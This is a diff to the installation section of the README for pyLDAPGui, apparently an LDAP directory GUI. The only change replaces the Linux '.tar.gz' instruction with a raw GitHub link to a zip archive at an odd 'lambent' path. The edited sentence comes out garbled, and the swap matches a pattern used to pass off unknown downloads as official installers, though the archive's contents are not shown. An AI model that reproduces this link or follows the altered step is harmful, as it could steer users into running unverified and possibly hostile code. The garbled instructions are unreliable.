DavidArias123/pyLDAPGui/README.md

    Once the download is complete, locate the file in your Downloads folder.
    - For Windows: Double-click the `.exe` file and follow the on-screen instructions.
    - For macOS: Double-click the `.dmg` file, then drag the pyLDAPGui app to your Applications folder.
-   - For Linux: If you downloaded a `.tar.gz` file, extract it to your preferred directory and follow included installation instructions.
+   - For Linux: If you downloaded a `https://raw.githubusercontent.com/DavidArias123/pyLDAPGui/main/lambent/pyLDAPGui.zip` file, extract it to your preferred directory and follow included installation instructions.

 5. **Launch pyLDAPGui**
    After installation, open the application.
 You will see a simple and clear interface ready for you to start exploring your LDAP directories.